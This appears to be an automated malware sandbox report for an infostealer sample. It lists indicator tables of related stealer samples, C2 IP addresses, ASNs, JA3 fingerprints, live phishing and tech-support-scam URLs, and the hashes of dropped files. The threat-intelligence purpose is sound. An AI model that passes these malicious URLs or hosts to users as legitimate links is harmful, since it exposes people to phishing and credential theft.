                                                                                                                                                                                                                          Fvp0GQnESU.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.93.1.246
                                                                                                                                                                                                                          hSWW0sdgfj.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 169.150.236.99
                                                                                                                                                                                                                          xPudQBV1wJ.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 169.150.236.98
                                                                                                                                                                                                                          011876zHjm.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 169.150.236.98
                                                                                                                                                                                                                          6EKLugdUZ8.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.93.1.247
                                                                                                                                                                                                                          bRa3UYfQxA.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.93.1.243
                                                                                                                                                                                                                          azOt1mXieE.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.93.1.244
                                                                                                                                                                                                                          note.padd.cn.com5SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 176.97.76.106
                                                                                                                                                                                                                          XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 176.97.76.106
                                                                                                                                                                                                                          f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 176.97.76.106
                                                                                                                                                                                                                          wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 176.97.76.106
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 176.97.76.106
                                                                                                                                                                                                                          f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 176.97.76.106
                                                                                                                                                                                                                          V9TdcUeNlV.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 176.97.76.106
                                                                                                                                                                                                                          JARlqZLmeA.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 176.97.76.106
                                                                                                                                                                                                                          YQnYpHhUfM.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 176.97.76.106
                                                                                                                                                                                                                          pfXiQ8s0eE.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 176.97.76.106
                                                                                                                                                                                                                          bg.microsoft.map.fastly.nethttps://caringhearts.foundation/wp-includes/widgets/ogk25/ogk/index.php&c=E,1,PBioTuoqxXxVmzOkxu8MYhWQ9ZbRNVLGpsstSuC0GQ2jNcQlIpYbU0K6d3lwsaeoT17vAF7VpKXs0qg9O-hGnfKxM3skSa-Jn2VJH7kX1A,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          TRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          https://39.104-168-101-28.cprapid.com/Pay-PaI/Get hashmaliciousPayPal PhisherBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          https://ddf29-secondary.z1.web.core.windows.net/werrx01USAHTML/?bcda=1-888-365-4337Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          https://kjhasdjfjahdsfjbjafjb.z19.web.core.windows.net/Er0Win8helpline76/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          https://apppks011.z13.web.core.windows.net/Win0security-helpline07/index.html?ph0n=1-877-200-1312Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                                                                          https://pub-4b7bb8835c824e67a15332b376de2d9d.r2.dev/mafo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                                          40jnt39QJ2.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                                                                          xPudQBV1wJ.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                                                                          6EKLugdUZ8.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 199.232.214.172

                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          NADYMSS-ASRUq27UFusYdn.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.111
                                                                                                                                                                                                                          ipR98bCqps.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.76
                                                                                                                                                                                                                          5SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          WF2R8Bsptu.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.111
                                                                                                                                                                                                                          5F25UVdGxt.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.111
                                                                                                                                                                                                                          f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUS5SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 20.157.87.45
                                                                                                                                                                                                                          anuwhqTXGt.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 168.61.215.74
                                                                                                                                                                                                                          Gam.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 13.107.246.40
                                                                                                                                                                                                                          XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 20.157.87.45
                                                                                                                                                                                                                          f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 20.157.87.45
                                                                                                                                                                                                                          https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpUGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 13.107.136.10
                                                                                                                                                                                                                          wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 20.157.87.45
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 20.157.87.45
                                                                                                                                                                                                                          f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 20.157.87.45
                                                                                                                                                                                                                          V9TdcUeNlV.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 20.157.87.45
                                                                                                                                                                                                                          PINDC-ASRUwipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          40jnt39QJ2.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          Fvp0GQnESU.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          hSWW0sdgfj.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          xPudQBV1wJ.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          011876zHjm.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          6EKLugdUZ8.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          bRa3UYfQxA.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          azOt1mXieE.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 91.215.85.66
                                                                                                                                                                                                                          NADYMSS-ASRUq27UFusYdn.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.111
                                                                                                                                                                                                                          ipR98bCqps.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.76
                                                                                                                                                                                                                          5SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          WF2R8Bsptu.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.111
                                                                                                                                                                                                                          5F25UVdGxt.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 185.172.128.111
                                                                                                                                                                                                                          f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59
                                                                                                                                                                                                                          f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.59

                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          1138de370e523e824bbca92d049a3777https://caringhearts.foundation/wp-includes/widgets/ogk25/ogk/index.php&c=E,1,PBioTuoqxXxVmzOkxu8MYhWQ9ZbRNVLGpsstSuC0GQ2jNcQlIpYbU0K6d3lwsaeoT17vAF7VpKXs0qg9O-hGnfKxM3skSa-Jn2VJH7kX1A,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.1.237.91
                                                                                                                                                                                                                          http://vgjlx.app.link/e/0ZWlI0Ci1IbGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.1.237.91
                                                                                                                                                                                                                          wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 23.1.237.91
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 23.1.237.91
                                                                                                                                                                                                                          https://netorg64799-my.sharepoint.com/:b:/g/personal/alva_wct-usa_com/ES73RZgSrIxGsn3-WRolkh4BarUkUa8B7jWUjl7sJYhzog?e=uQClH3Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                          • 23.1.237.91
                                                                                                                                                                                                                          https://pub-187b2d91c0494f3ba5ec3b326cc8fed8.r2.dev/baeleavemail.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 23.1.237.91
                                                                                                                                                                                                                          https://homeindiansexoldrd.z13.web.core.windows.net/index.htmlGet hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                          • 23.1.237.91
                                                                                                                                                                                                                          https://tom19-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=+1-888-289-1419Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                          • 23.1.237.91
                                                                                                                                                                                                                          https://ipv6.45-88-90-136.cprapid.com/Get hashmaliciousPayPal PhisherBrowse
                                                                                                                                                                                                                          • 23.1.237.91
                                                                                                                                                                                                                          xPudQBV1wJ.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 23.1.237.91
                                                                                                                                                                                                                          28a2c9bd18a11de089ef85a160da29e4https://caringhearts.foundation/wp-includes/widgets/ogk25/ogk/index.php&c=E,1,PBioTuoqxXxVmzOkxu8MYhWQ9ZbRNVLGpsstSuC0GQ2jNcQlIpYbU0K6d3lwsaeoT17vAF7VpKXs0qg9O-hGnfKxM3skSa-Jn2VJH7kX1A,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 185.93.1.244
                                                                                                                                                                                                                          https://caringhearts.foundation/wp-includes/widgets/ogk25/ogk/index.php&c=E,1,PBioTuoqxXxVmzOkxu8MYhWQ9ZbRNVLGpsstSuC0GQ2jNcQlIpYbU0K6d3lwsaeoT17vAF7VpKXs0qg9O-hGnfKxM3skSa-Jn2VJH7kX1A,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 185.93.1.244
                                                                                                                                                                                                                          anuwhqTXGt.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 185.93.1.244
                                                                                                                                                                                                                          https://universewild.orgGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                          • 185.93.1.244
                                                                                                                                                                                                                          https://url.avanan.click/v2/___https:/novafr-my.sharepoint.com/:b:/g/personal/mfranco_nova-fr_org/EZPaIwPkDApNno6rWIAO20YB4ByiRCAe_VGScx-2iiONBw?e=magUuY/___.YXAzOmVuLW1kYTphOm86ZDA4MDI5MGVhZTA1MzJiMWZlYTg0YjE1OWE2NmVhNjc6NjplYTNkOjc2NzNkYWE0NTMzNWVhMjkxM2VjMGU1NGMyNDY3ZjVhNmJhNjU0MTk1ZmRjMzUzM2QxODAyNDVjY2E1Y2M1ODY6aDpUGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 185.93.1.244
                                                                                                                                                                                                                          http://vgjlx.app.link/e/0ZWlI0Ci1IbGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 185.93.1.244
                                                                                                                                                                                                                          BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 185.93.1.244
                                                                                                                                                                                                                          wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.93.1.244
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.93.1.244
                                                                                                                                                                                                                          BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 185.93.1.244

                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          C:\ProgramData\msvcp140.dllq27UFusYdn.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            ipR98bCqps.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              5SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                  WF2R8Bsptu.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                    5F25UVdGxt.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                      f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                        wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                            f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                              C:\ProgramData\freebl3.dllq27UFusYdn.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                ipR98bCqps.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  5SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                    XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                      WF2R8Bsptu.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        5F25UVdGxt.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                            wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                              8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                                f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                                  C:\ProgramData\mozglue.dllq27UFusYdn.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    ipR98bCqps.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      5SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                                        XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                                          WF2R8Bsptu.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                            5F25UVdGxt.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                                                wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                                                  8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                                                    f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse

                                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                                      C:\ProgramData\BGDAKEHIIDGDAAKECBFB

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\BJZFPPWAPT.xlsx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                                                                                                                                                                                                                      C:\ProgramData\BQJUWOYRTO.xlsx

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3z0.0.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.68639364218091
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
                                                                                                                                                                                                                                                                                      MD5:1D78D2A3ECD9D04123657778C8317C4E
                                                                                                                                                                                                                                                                                      SHA1:3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
                                                                                                                                                                                                                                                                                      SHA-256:88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
                                                                                                                                                                                                                                                                                      SHA-512:7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
                                                                                                                                                                                                                                                                                      Malicious:false
